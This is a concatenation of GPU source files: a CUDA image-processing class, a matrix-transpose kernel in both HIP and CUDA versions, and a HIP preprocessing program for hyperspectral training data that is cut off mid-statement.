#include "../include/common.h" #include "../include/functions.cuh" #include "../include/image.cuh" #include "../include/kernel.h" #include "../libs/stb/stb_image.h" #include "../libs/stb/stb_image_write.h" #include <bits/stdc++.h> #include <cuda_runtime.h> #include <thrust/device_vector.h> #include <thrust/host_vector.h> #include <thrust/sort.h> #include <stdexcept> Image::Image(const char *filename, bool grayscale) { _filename = filename; int desiredChannels = 3; if (grayscale) { desiredChannels = 1; } int w, h, c; unsigned char *data = stbi_load(_filename, &w, &h, &c, desiredChannels); if (!data) { return; } _width = w; _height = h; _channels = desiredChannels; _nBytes = w * h * desiredChannels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < w * h * desiredChannels; i++) { _h_data[i] = data[i]; } // Allocate space for the cuda copy. cudaMalloc((unsigned char **)&_d_data, _nBytes); stbi_image_free(data); } Image::Image(const Image &obj) { _device = obj._device; _filename = obj._filename; _width = obj._width; _height = obj._height; _channels = obj._channels; _nBytes = _width * _height * _channels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < _width * _height * _channels; i++) { _h_data[i] = obj._h_data[i]; } // Allocate space for the cuda copy. cudaMalloc((unsigned char **)&_d_data, _nBytes); cudaMemcpy(_d_data, obj._d_data, _nBytes, cudaMemcpyDeviceToDevice); } Image::~Image(void) { free(_h_data); cudaFree(_d_data); } Image Image::operator-(const Image &obj) { // Return if images have different sizes. if (_width != obj._width or _height != obj._height or _channels != obj._channels) { throw std::invalid_argument("images have different sizes"); } Image result(obj); result.setDevice(_device); if (strcmp(_device, _validDevices[0]) == 0) { differenceOnHost(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getSize() + threads.x - 1) / threads.x, 1); differenceOnDevice<<<blocks, threads>>>(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } return result; } int Image::getChannels() { return _channels; } unsigned char *Image::getData() { if (strcmp(_device, _validDevices[0]) == 0) { return _h_data; } else { return _d_data; } } const char *Image::getDevice() { return _device; } unsigned int *Image::getElement(int index) { unsigned int *values = new unsigned int[_channels]; if (index >= _width * _height) { return NULL; } // Synchronize matrices if needed. // TODO optimise synchronization to avoid to check everytime when on cuda. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } for (int c = 0; c < _channels; c++) { values[c] = _h_data[index * _channels + c]; } return values; } unsigned int *Image::getElement(int row, int col) { if (row >= _height or col >= _width) { return NULL; } return getElement(row * _width + col); } const char *Image::getFilename() { return _filename; } int Image::getHeight() { return _height; } int Image::getSize() { return _width * _height * _channels; } int Image::getWidth() { return _width; } bool Image::isSynchronized() { unsigned char *h_d_data_copy = (unsigned char *)malloc(_nBytes); cudaMemcpy(h_d_data_copy, _d_data, _nBytes, cudaMemcpyDeviceToHost); float epsilon = 1.0E-8; int match = 1; for (int i = 0; i < getSize(); i++) { if (abs(_h_data[i] - h_d_data_copy[i]) > epsilon) { match = 0; break; } } free(h_d_data_copy); return match; } void Image::save(const char *filename) { // Synchronize matrices if needed. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } stbi_write_png(filename, _width, _height, _channels, _h_data, _width * _channels); } void Image::setDevice(const char *device) { if (arrayContains(_validDevices, device) == 0) { return; } if (strcmp(device, _device) != 0) { _device = device; if (strcmp(device, _validDevices[0]) == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } else { cudaMemcpy(_d_data, _h_data, _nBytes, cudaMemcpyHostToDevice); } } } void Image::calcOpticalFlow(int *currentCorners, Image *previousFrame, int *corners, int maxCorners, int levels) { Image *gray = new Image(getFilename(), true); Image *prevGray = new Image(previousFrame->getFilename(), true); gray->setDevice(getDevice()); prevGray->setDevice(getDevice()); if (strcmp(_device, _validDevices[0]) == 0) { unsigned char *currPyramidalScales[levels]; unsigned char *prevPyramidalScales[levels]; // Create the pyramidal scales. for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); currPyramidalScales[l] = new unsigned char[gray->getSize()]; prevPyramidalScales[l] = new unsigned char[prevGray->getSize()]; if (l == 0) { for (int i = 0; i < gray->getSize(); i++) { currPyramidalScales[l][i] = gray->getData()[i]; prevPyramidalScales[l][i] = prevGray->getData()[i]; } } else { scaleOnHost(currPyramidalScales[l], currPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnHost(prevPyramidalScales[l], prevPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); } } opticalFLowOnHost(currentCorners, corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getWidth(), gray->getHeight()); // Free memory. for (int l = 0; l < levels; l++) { delete[] currPyramidalScales[l]; delete[] prevPyramidalScales[l]; } } else { // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_corners, *d_currCorners; cudaMalloc((int **)&d_corners, cornersBytes); cudaMalloc((int **)&d_currCorners, cornersBytes); cudaMemcpy(d_corners, corners, cornersBytes, cudaMemcpyHostToDevice); // Create the pyramidal scales. size_t pyramidBytes = gray->getSize() * sizeof(unsigned char); unsigned char *currPyramidalScales, *prevPyramidalScales; cudaMalloc((unsigned char **)&currPyramidalScales, levels * pyramidBytes); cudaMalloc((unsigned char **)&prevPyramidalScales, levels * pyramidBytes); int copyBlockSize = 1024; dim3 copyThreads(copyBlockSize, 1); dim3 copyBlocks( (gray->getWidth() * gray->getHeight() + copyThreads.x - 1) / copyThreads.x, 1); for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); if (l == 0) { cudaMemcpy(currPyramidalScales, gray->getData(), pyramidBytes, cudaMemcpyDeviceToDevice); cudaMemcpy(prevPyramidalScales, prevGray->getData(), pyramidBytes, cudaMemcpyDeviceToDevice); } else { scaleOnDevice<<<copyBlocks, copyThreads>>>( currPyramidalScales + l * gray->getSize(), currPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnDevice<<<copyBlocks, copyThreads>>>( prevPyramidalScales + l * gray->getSize(), prevPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); } } // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxCorners + copyThreads.x - 1) / copyThreads.x, 1); // Initialise all work on the device asynchronously in depth-first // order. opticalFLowOnDevice<<<blocks, threads>>>( d_currCorners, d_corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getSize(), gray->getWidth(), gray->getHeight()); cudaMemcpy(currentCorners, d_currCorners, cornersBytes, cudaMemcpyDeviceToHost); // Free memory. cudaFree(d_corners); cudaFree(d_currCorners); cudaFree(currPyramidalScales); cudaFree(prevPyramidalScales); } // Free memory. delete gray; delete prevGray; } void Image::convolution(float *kernel, int kernelSide) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } convolutionOnHost(getData(), dataCopy, kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Create a copy of the data on device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, getData(), _nBytes, cudaMemcpyDeviceToDevice); // Copy kernel to device. float *d_kernel; cudaMalloc((float **)&d_kernel, kernelSide * kernelSide * sizeof(float)); cudaMemcpy(d_kernel, kernel, kernelSide * kernelSide * sizeof(float), cudaMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); convolutionOnDevice<<<blocks, threads>>>(getData(), dataCopy, d_kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(d_kernel); cudaFree(dataCopy); } } void Image::drawLine(int index1, int index2, int radius, int *color, int colorSize) { if (index1 < 0 or index2 < 0) { return; } int x1 = (int)(index1 / getWidth()); int y1 = (index1 % getWidth()); int x2 = (int)(index2 / getWidth()); int y2 = (index2 % getWidth()); this->drawLine(x1, y1, x2, y2, radius, color, colorSize); } void Image::drawLine(int x1, int y1, int x2, int y2, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawLineOnHost(getData(), x1, y1, x2, y2, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; cudaMalloc((int **)&d_color, colorBytes); cudaMemcpy(d_color, color, colorBytes, cudaMemcpyHostToDevice); drawLineOnDevice<<<blocks, threads>>>(getData(), x1, y1, x2, y2, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(d_color); } } void Image::drawPoint(int index, int radius, int *color, int colorSize) { if (index < 0) { return; } int x = (int)(index / getWidth()); int y = (index % getWidth()); this->drawPoint(x, y, radius, color, colorSize); } void Image::drawPoint(int x, int y, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawPointOnHost(getData(), x, y, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; cudaMalloc((int **)&d_color, colorBytes); cudaMemcpy(d_color, color, colorBytes, cudaMemcpyHostToDevice); drawPointOnDevice<<<blocks, threads>>>(getData(), x, y, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(d_color); } } void Image::findHomography(float *A, int *currentCorners, int *previousCorners, int maxCorners) { const int maxIter = 2000; const int N_POINTS = 3; const int SPACE_DIM = 2; int size = N_POINTS * (SPACE_DIM + 1) * maxIter; float *matrices = new float[size]; float *scores = new float[maxIter]; // Estimate maxIter different rigid transformations. // The algorithm estimates a matrix using a triplet of points. if (strcmp(_device, _validDevices[0]) == 0) { findHomographyRANSACOnHost(matrices, scores, maxIter, currentCorners, previousCorners, maxCorners, getWidth(), getHeight()); } else { // Instantiate matrices on device. size_t matricesBytes = size * sizeof(float); size_t scoresBytes = maxIter * sizeof(float); float *d_matrices, *d_scores; cudaMalloc((float **)&d_matrices, matricesBytes); cudaMalloc((float **)&d_scores, scoresBytes); // Copy corners on device. // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_currCorners, *d_prevCorners; cudaMalloc((int **)&d_currCorners, cornersBytes); cudaMalloc((int **)&d_prevCorners, cornersBytes); cudaMemcpy(d_currCorners, currentCorners, cornersBytes, cudaMemcpyHostToDevice); cudaMemcpy(d_prevCorners, previousCorners, cornersBytes, cudaMemcpyHostToDevice); // Generate a random list of indices. std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> uniform(0, maxCorners); int *randomIndices = new int[N_POINTS * maxIter]; for (int i = 0; i < N_POINTS * maxIter; i++) { randomIndices[i] = uniform(gen); } // Copy random indices to device. size_t randomIndicesBytes = N_POINTS * maxIter * sizeof(int); int *d_randomIndices; cudaMalloc((int **)&d_randomIndices, randomIndicesBytes); cudaMemcpy(d_randomIndices, randomIndices, randomIndicesBytes, cudaMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxIter + threads.x - 1) / threads.x, 1); findHomographyRANSACOnDevice<<<blocks, threads>>>( d_matrices, d_scores, maxIter, d_currCorners, d_prevCorners, maxCorners, d_randomIndices, getWidth(), getHeight()); // Copy result to host. cudaMemcpy(matrices, d_matrices, matricesBytes, cudaMemcpyDeviceToHost); cudaMemcpy(scores, d_scores, scoresBytes, cudaMemcpyDeviceToHost); cudaFree(d_matrices); cudaFree(d_scores); cudaFree(d_currCorners); cudaFree(d_prevCorners); delete[] randomIndices; cudaFree(d_randomIndices); } // Retrieve the best matrix. int bestMatrix = -1; float minError = INFINITY; for (int i = 0; i < maxIter; i++) { if (scores[i] < minError) { int offset = i * (N_POINTS * (SPACE_DIM + 1)); // Avoid nan transformations. if (matrices[offset] == matrices[offset]) { bestMatrix = i; minError = scores[i]; } } } // Copy the best matrix element-wise. int offset = bestMatrix * (N_POINTS * (SPACE_DIM + 1)); for (int i = 0; i < N_POINTS * (SPACE_DIM + 1); i++) { if (minError < INFINITY) { A[i] = matrices[offset + i]; } else { // If the minError is INFINITY, then set the transformation to // the identity matrix to avoid any type of transformation. int side = sqrt(N_POINTS * (SPACE_DIM + 1)); A[i] = int(i % side == (int)i / side); } } delete[] matrices; delete[] scores; } void Image::goodFeaturesToTrack(int *corners, int maxCorners, float qualityLevel, float minDistance) { Image *gradX = new Image(getFilename(), true); Image *gradY = new Image(getFilename(), true); gradX->setDevice(getDevice()); gradY->setDevice(getDevice()); int side; float *sobelX, *sobelY; Kernel::SobelX(&sobelX, &side); Kernel::SobelY(&sobelY); gradX->convolution(sobelX, side); gradY->convolution(sobelY, side); int scoreSize = getWidth() * getHeight(); float *scoreMatrix = new float[scoreSize]; int *keys = new int[scoreSize]; float *values = new float[scoreSize]; if (strcmp(_device, _validDevices[0]) == 0) { cornerScoreOnHost(gradX->getData(), gradY->getData(), scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::host_vector<int> h_keys(scoreSize, 0); thrust::sequence(h_keys.begin(), h_keys.end()); thrust::stable_sort_by_key(scoreMatrix, scoreMatrix + scoreSize, h_keys.begin(), thrust::greater<float>()); thrust::copy(h_keys.begin(), h_keys.end(), keys); thrust::copy(scoreMatrix, scoreMatrix + scoreSize, values); } else { // Copy corner array to device. size_t scoreMatrixBytes = scoreSize * sizeof(float); float *d_scoreMatrix; cudaMalloc((float **)&d_scoreMatrix, scoreMatrixBytes); // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((scoreSize + threads.x - 1) / threads.x, 1); cornerScoreOnDevice<<<blocks, threads>>>( gradX->getData(), gradY->getData(), d_scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::device_ptr<float> d_values(d_scoreMatrix); thrust::device_vector<int> d_keys(scoreSize, 0); thrust::sequence(d_keys.begin(), d_keys.end()); thrust::stable_sort_by_key(d_values, d_values + scoreSize, d_keys.begin(), thrust::greater<float>()); thrust::copy(d_keys.begin(), d_keys.end(), keys); thrust::copy(d_values, d_values + scoreSize, values); } float threshold = values[0] * qualityLevel; int top = 0; for (int i = 0; i < maxCorners; ++i) { corners[i] = -1; float kValue; int kIndex; bool isDistant; do { kValue = values[top]; kIndex = keys[top]; isDistant = true; // Evaluate the Euclidean distance to the previous corners. int j = 0; while (j < i and isDistant) { int otherIndex = corners[j]; int dx = ((int)otherIndex / getWidth()) - ((int)kIndex / getWidth()); int dy = (otherIndex % getWidth()) - (kIndex % getWidth()); int dist = sqrt(pow(dx, 2) + pow(dy, 2)); isDistant = dist > minDistance; j++; } if (isDistant) { // Add only if score is high enough. if (kValue >= threshold) { corners[i] = kIndex; } } top++; } while (not isDistant); } // Free memory. delete gradX; delete gradY; delete[] sobelX; delete[] sobelY; delete[] scoreMatrix; delete[] keys; delete[] values; } void Image::rotate(double degree) { double rad = degree * (M_PI / 180); unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } rotateOnHost(getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, _d_data, _nBytes, cudaMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); rotateOnDevice<<<blocks, threads>>>( getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(dataCopy); } } void Image::scale(float ratio) { // Return if ratio is invalid. if (ratio == 1.0 or ratio < 0.0) { return; } unsigned char *newData; int newWidth = int(getWidth() * ratio); int newHeight = int(getHeight() * ratio); int newBytes = newWidth * newHeight * getChannels() * sizeof(unsigned char); if (strcmp(_device, _validDevices[0]) == 0) { newData = (unsigned char *)malloc(newBytes); scaleOnHost(newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. free(_h_data); _h_data = newData; cudaFree(_d_data); cudaMalloc((unsigned char **)&_d_data, newBytes); cudaMemcpy(_d_data, _h_data, newBytes, cudaMemcpyHostToDevice); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((newWidth * newHeight + threads.x - 1) / threads.x, 1); cudaMalloc((unsigned char **)&newData, newBytes); scaleOnDevice<<<blocks, threads>>>( newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. cudaFree(_d_data); cudaMalloc((unsigned char **)&_d_data, newBytes); cudaMemcpy(_d_data, newData, newBytes, cudaMemcpyDeviceToDevice); free(_h_data); _h_data = (unsigned char *)malloc(newBytes); cudaMemcpy(_h_data, _d_data, newBytes, cudaMemcpyDeviceToHost); // Free memory. cudaFree(newData); } // Update other attributes. _width = newWidth; _height = newHeight; _nBytes = newBytes; } void Image::translate(int px, int py) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } translateOnHost(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. cudaMalloc((unsigned char **)&dataCopy, _nBytes); cudaMemcpy(dataCopy, _d_data, _nBytes, cudaMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); translateOnDevice<<<blocks, threads>>>(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. cudaFree(dataCopy); } } void Image::transpose() { // Return if width and height are different. if (getWidth() != getHeight()) { throw std::invalid_argument("width and height must have the same size"); } if (strcmp(_device, _validDevices[0]) == 0) { transposeOnHost(getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); transposeOnDevice<<<blocks, threads>>>(getData(), getWidth(), getHeight(), getChannels()); } }
0c32ddc30bd58dfa21a8630c8480d226e4fba98b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "../tools/checkerrors.h" #include <iostream> #define BLOCK_DIM 16 // Threadblock size for matrix transposition template <typename TYPE> __global__ void transposing(TYPE *odata, TYPE *idata, int width, int height) { __shared__ float block[BLOCK_DIM][BLOCK_DIM+1]; unsigned int xIndex = blockIdx.x * BLOCK_DIM + threadIdx.x; unsigned int yIndex = blockIdx.y * BLOCK_DIM + threadIdx.y; if((xIndex < width) && (yIndex < height)) { unsigned int index_in = yIndex * width + xIndex; block[threadIdx.y][threadIdx.x] = idata[index_in]; } __syncthreads(); xIndex = blockIdx.y * BLOCK_DIM + threadIdx.x; yIndex = blockIdx.x * BLOCK_DIM + threadIdx.y; if((xIndex < height) && (yIndex < width)) { unsigned int index_out = yIndex * height + xIndex; odata[index_out] = block[threadIdx.x][threadIdx.y]; } } // Wrapper function template <typename TYPE> void call_transposing (TYPE *odata, TYPE *idata, int width, int height) { checkCuda(hipFuncSetCacheConfig(transposing, hipFuncCachePreferShared)); dim3 blocks (ceil((float)width / BLOCK_DIM), ceil((float)height / BLOCK_DIM)); dim3 threads (BLOCK_DIM, BLOCK_DIM); hipLaunchKernelGGL(( transposing <TYPE>) , dim3(blocks),dim3(threads), 0, 0, odata , idata , width , height); checkCudaErrors(); }
0c32ddc30bd58dfa21a8630c8480d226e4fba98b.cu
#include "../tools/checkerrors.h" #include <iostream> #define BLOCK_DIM 16 // Threadblock size for matrix transposition template <typename TYPE> __global__ void transposing(TYPE *odata, TYPE *idata, int width, int height) { __shared__ float block[BLOCK_DIM][BLOCK_DIM+1]; unsigned int xIndex = blockIdx.x * BLOCK_DIM + threadIdx.x; unsigned int yIndex = blockIdx.y * BLOCK_DIM + threadIdx.y; if((xIndex < width) && (yIndex < height)) { unsigned int index_in = yIndex * width + xIndex; block[threadIdx.y][threadIdx.x] = idata[index_in]; } __syncthreads(); xIndex = blockIdx.y * BLOCK_DIM + threadIdx.x; yIndex = blockIdx.x * BLOCK_DIM + threadIdx.y; if((xIndex < height) && (yIndex < width)) { unsigned int index_out = yIndex * height + xIndex; odata[index_out] = block[threadIdx.x][threadIdx.y]; } } // Wrapper function template <typename TYPE> void call_transposing (TYPE *odata, TYPE *idata, int width, int height) { checkCuda(cudaFuncSetCacheConfig(transposing, cudaFuncCachePreferShared)); dim3 blocks (ceil((float)width / BLOCK_DIM), ceil((float)height / BLOCK_DIM)); dim3 threads (BLOCK_DIM, BLOCK_DIM); transposing <TYPE> <<<blocks,threads>>> (odata , idata , width , height); checkCudaErrors(); }
35a31397fcaf9cc86ea9e0d7cf3eceb4bad50cb9.hip
// !!! This is a file automatically generated by hipify!!! #include <mat.h> #include <stdio.h> #include <time.h> #include <sys/time.h> #include <math.h> #include <iostream> #include "rocblas.h" #include "cokus.cpp" #include "cuda_util.h" #include <hip/hip_runtime.h> using namespace std; const int NEU_NUM2 = 13; const int NEIGHBOR = 8;// //const int DATA_BATCH = 512;//512 //CUDA bool InitCUDA(){ int count; hipGetDeviceCount(&count); if(count==0){ fprintf(stderr,"There is no device.\n"); return false; } int i; for (i =0; i<count;i++){ hipDeviceProp_t prop; if(hipGetDeviceProperties(&prop,i)==hipSuccess){ if(prop.major>=1){ break; } } } if(i==count){ fprintf(stderr,"There is no device supporting CUDA 1.x.\n"); return false; } hipSetDevice(i); return true; } //copyshared memory __device__ void copy_data_to_shared(double * data, double * data_tmp, int length){ for(int i=0; i<length; i++){ data_tmp[i] = data[i]; } __syncthreads(); } // __global__ static void processing(int iter, double * data, int * train_index, double * processed_data, int x, int y, int z, int train_size) { int tid = blockIdx.x * blockDim.x + threadIdx.x; int threadNum = blockDim.x * gridDim.x; int id = tid + iter * threadNum; int idx = id * (NEIGHBOR+1) * z;//processed_data if (id < train_size){ for (int i=0; i<z; i++){ for (int j=0; j<(NEIGHBOR+1); j++){ processed_data[idx] = data[train_index[j + id*(NEIGHBOR+1)] + i * x*y]; idx = idx + 1; } } } } // int preprocess(double * data, double * labels, int x, int y, int z){ double * gpu_data;// double * gpu_processed_train;// double * gpu_processed_test; int * gpu_train_index;// int * gpu_test_index; // int data_size = 0; int * data_index = new int [x*y]; for(int i=0; i<x*y; i++){ if(labels[i] != 0){ data_index[data_size]=i; data_size ++; } } int test_size = (data_size-1)/5 + 1; int train_size = data_size - test_size; fprintf(stdout,"train_size:%d test_size:%d\n",train_size,test_size); int * train_index = new int [train_size * (NEIGHBOR + 1)];//9x*y int * test_index = new int [test_size * (NEIGHBOR+1)]; double * processed_labels = new double [train_size * NEU_NUM2]; double * test_labels = new double [test_size]; int tr=0, te=0; for (int i=0; i<data_size; i++){ if (i%5 != 0){ train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1)] = data_index[i];// train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) - 1] = data_index[i] - 1; train_index[(NEIGHBOR/2) + tr * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ train_index[j0 + tr * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; train_index[j0+6 + tr * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){// for (int j=0; j<3; j++) train_index[j*3 + tr*(NEIGHBOR+1)] = train_index[j*3+2 + tr*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){// for(int j=0;j<3;j++) train_index[j*3+2 + tr*(NEIGHBOR+1)] = train_index[j*3 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){// for(int j=0;j<3;j++) train_index[j + tr*(NEIGHBOR+1)] = train_index[j+6 + tr*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){// for(int j=0;j<3;j++) train_index[j+6 + tr*(NEIGHBOR+1)] = train_index[j + tr*(NEIGHBOR+1)]; } int mid = int(labels[data_index[i]])-1 + tr*NEU_NUM2; processed_labels[mid] = 1; tr = tr + 1; } else{ test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1)] = data_index[i];// test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) - 1] = data_index[i] - 1; test_index[(NEIGHBOR/2) + te * (NEIGHBOR+1) + 1] = data_index[i] + 1; for(int j0=0;j0<3;j0++){ test_index[j0 + te * (NEIGHBOR+1)] = data_index[i] - 1 - x + j0; test_index[j0+6 + te * (NEIGHBOR+1)] = data_index[i] - 1 + x + j0; } if((data_index[i] % x) == 0){// for (int j=0; j<3; j++) test_index[j*3 + te*(NEIGHBOR+1)] = test_index[j*3+2 + te*(NEIGHBOR+1)]; } if((data_index[i] % x) == (x-1)){// for(int j=0;j<3;j++) test_index[j*3+2 + te*(NEIGHBOR+1)] = test_index[j*3 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == 0){// for(int j=0;j<3;j++) test_index[j + te*(NEIGHBOR+1)] = test_index[j+6 + te*(NEIGHBOR+1)]; } if((data_index[i]/x) == (y-1)){// for(int j=0;j<3;j++) test_index[j+6 + te*(NEIGHBOR+1)] = test_index[j + te*(NEIGHBOR+1)]; } //int mid = int(labels[data_index[i]])-1 + te*NEU_NUM2; test_labels[te] = labels[data_index[i]]; te = te + 1; } } fprintf(stdout,"train_size:%d\n",train_size); fprintf(stdout,"test_size:%d\n",test_size); //fprintf(stdout,"train_index[0]:%d %d %d %d,%d %d %d %d\n",train_index[0],train_index[1],train_index[2],train_index[3],train_index[5],train_index[6],train_index[7],train_index[8]); //fprintf(stdout,"train_index[10248]:%d %d %d %d,%d %d %d %d\n",train_index[9*10248],train_index[1+9*10248],train_index[2+9*10248],train_index[3+9*10248],train_index[5+9*10248],train_index[6+9*10248],train_index[7+9*10248],train_index[8+9*10248]); //int * train_index = new int [train_size * (NEIGHBOR + 1)];//train_size9 fprintf(stdout,"Index computing completed!\n"); // SAFE_CALL(hipMalloc((void **) &gpu_data, sizeof(double) * x * y * z)); SAFE_CALL(hipMemcpy(gpu_data, data, sizeof(double)* x * y * z, hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_train_index, sizeof(int) * train_size * (NEIGHBOR+1))); SAFE_CALL(hipMemcpy(gpu_train_index, train_index, sizeof(int) * train_size * (NEIGHBOR+1), hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_test_index, sizeof(int) * test_size * (NEIGHBOR+1))); SAFE_CALL(hipMemcpy(gpu_test_index, test_index, sizeof(int) * test_size * (NEIGHBOR+1), hipMemcpyHostToDevice)); SAFE_CALL(hipMalloc((void **) &gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z));// SAFE_CALL(hipMalloc((void **) &gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z)); int gridsize = 64; int blocksize = 1024; int threadnum = gridsize * blocksize; double * processed_train = new double [train_size * (NEIGHBOR+1) * z];\ double * processed_test = new double [test_size * (NEIGHBOR+1) *z]; // for (int iter=0; iter<=train_size/threadnum; iter++){ hipLaunchKernelGGL(( processing), dim3(gridsize),dim3(blocksize), 0, 0, iter, gpu_data, gpu_train_index, gpu_processed_train, x, y, z, train_size); hipLaunchKernelGGL(( processing), dim3(gridsize),dim3(blocksize), 0, 0, iter, gpu_data, gpu_test_index, gpu_processed_test, x, y, z, test_size); } hipDeviceSynchronize(); SAFE_CALL(hipMemcpy(processed_train, gpu_processed_train, sizeof(double) * train_size * (NEIGHBOR+1) * z, hipMemcpyDeviceToHost)); SAFE_CALL(hipMemcpy(processed_test, gpu_processed_test, sizeof(double) * test_size * (NEIGHBOR+1) * z, hipMemcpyDeviceToHost)); //hipDeviceSynchronize(); fprintf(stdout,"Processed train data:%lf %lf %lf %lf\n",processed_train[0],processed_train[1],processed_train[2],processed_train[3]); fprintf(stdout,"Processed test data:%lf %lf %lf %lf\n",processed_test[0],processed_test[1],processed_test[2],processed_test[3]); MATFile * pmatFile; pmatFile = matOpen("testdata.mat","w"); mxArray * m1 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,test_size,mxREAL); memcpy((void *)mxGetPr(m1), (void *)processed_test, sizeof(double) * (NEIGHBOR+1) * z * test_size); matPutVariable(pmatFile, "data", m1); mxArray * m2 = mxCreateDoubleMatrix(test_size,1,mxREAL); memcpy((void *)mxGetPr(m2), (void *)test_labels, sizeof(double) * test_size); matPutVariable(pmatFile, "data", m2); matClose(pmatFile); MATFile * pmatFile0; pmatFile0 = matOpen("traindata.mat","w"); mxArray * m3 = mxCreateDoubleMatrix((NEIGHBOR+1)*z,train_size,mxREAL); memcpy((void *)mxGetPr(m3), (void *)processed_train, sizeof(double) * (NEIGHBOR+1) * z * train_size); matPutVariable(pmatFile0, "data", m3); mxArray * m4 = mxCreateDoubleMatrix(NEU_NUM2,train_size,mxREAL); memcpy((void *)mxGetPr(m4), (void *)processed_labels, sizeof(double) * train_size * 